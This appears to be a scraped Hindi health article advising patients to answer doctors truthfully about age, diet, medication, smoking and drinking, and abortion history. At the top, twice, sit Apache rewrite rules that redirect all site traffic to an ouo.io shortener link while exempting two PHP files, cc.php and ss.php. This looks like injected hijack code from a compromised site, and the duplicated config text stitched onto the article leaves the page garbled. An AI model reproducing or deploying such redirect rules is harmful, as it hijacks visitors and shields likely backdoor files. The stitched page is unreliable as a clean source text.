
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 1662
Previous Nextजब कभी किसी शारीरिक परेशानी या बीमारी के सिलसिले में आप डॉक्टर के पास जाते हैं, तो इलाज से पहले डॉक्टर आपसे कुछ सवाल पूछते हैं। कई बार आपको ये सवाल बकवास लगते हैं क्योंकि इन सवालों का सीधा संबंध आपकी बीमारी से नहीं होता है या कई बार कुछ सवाल ऐसे होते हैं, जिनका जवाब आप देना नहीं चाहते हैं इसलिए डॉक्टर से झूठ बोल देते हैं। मगर आपको बता दें कि ऐसा करना कई बार खतरनाक हो सकता है क्योंकि डॉक्टर के हर सवाल का प्रत्यक्ष या अप्रत्यक्ष संबंध आपकी शारीरिक परेशानी से होता है और इसका गलत जवाब देने पर डॉक्टर बीमारी का गलत अनुमान लगा सकता है। कुछ ऐसे सवाल हैं जिनका जवाब डॉक्टर को देते समय आपको पूरी सावधानी बरतनी चाहिए और सही जवाब देना चाहिए। आइये आपको बताते हैं क्या हैं वो सवाल।
आपकी उम्र क्या है?: बीमारियों के इलाज के समय अक्सर डॉक्टर आपसे आपकी उम्र पूछते हैं। एक शोध के मुताबिक डॉक्टर के इस सवाल पर 90 प्रतिशत से ज्यादा लोग अपनी उम्र कम कर के बताते हैं या अंदाजे से बताते हैं। कई बीमारियां ऐसी हैं जिनमें आपकी सही उम्र न पता चलने पर आपका इलाज गलत हो सकता है या रोग का अंदाजा गलत लगाया जा सकता है। इसलिए कम से कम डॉक्टर से अपनी उम्र छिपाने की समझदारी तो आपको नहीं करनी चाहिए।
आपने क्या खाया है?: इस सवाल का जवाब भी बहुत से लोग गलत देते हैं कि उन्होंने क्या खाया है। कई बार कुछ बीमारियों का सीधा संबंध हमें अपने खाए गए आहार से दिखाई नहीं देता है मगर उसमें मौजूद कुछ तत्वों का संबंध इससे हो सकता है, जिसके बारे में डॉक्टर हमसे ज्यादा बेहतर समझते हैं। इसके साथ ही अगर आपको खाने से संबंधित कोई विशेष आदत है, तो वो भी आपको डॉक्टर को बता देना चाहिए।
दवाएं ठीक से ले रहे हैं?: जब किसी डॉक्टर के पास आप दोबारा जांच के लिए जाते हैं, तो डॉक्टर अक्सर आपसे पूछते हैं कि क्या पहले दी हुई सभी दवाओं को आपने सही टाइम पर खाया है? इस सवाल का जवाब भी बहुत से लोग गलत देते हैं। अगर आपने दवा की कोई डोज मिस कर दी है या आराम मिलने के बाद आपने दवा बंद कर दी है, तो आपको इस बात को अपने चिकित्सक से साफ-साफ बताना चाहिए।
सिगरेट-शराब पीते हैं?: चिकित्सक मरीज से अक्सर ये सवाल भी पूछते हैं कि क्या वो तंबाकू, शराब या किसी नशीले पदार्थ का सेवन करते हैं या धूम्रपान करते हैं या कितना करते हैं? इस सवाल का जवाब भी बहुत से लोग गलत देते हैं। अक्सर आप दिन भी पी गई सिगरेट की संख्या या शराब की मात्रा को कम करके बताते हैं। लेकिन गंभीर बीमारियों के मामले में ये घातक हो सकता है क्योंकि कई बार आपकी इन आदतों का सीधा संबंध आपकी बीमारी से होता है।
क्या आपने अबॉर्शन करवाया है?: आमतौर पर अनमैरिड लड़कियां तो इस सवाल का जवाब गलत देती ही हैं, कई बार विवाहित महिलाएं भी इस सवाल का गलत जवाब देती हैं। जबकि आपकी किसी बीमारी या शारीरिक अवस्था के पीछे अबॉर्शन का बहुत बड़ा हाथ हो सकता है। इसलिए इस तरह के सवालों का जवाब कभी भी गलत नहीं देना चाहिए। इसके साथ ही शारीरिक संबंधों से या पीरियड्स की गड़बड़ी से जुड़े सवालों का गलत जवाब देना भी आपके लिए खतरनाक हो सकता है।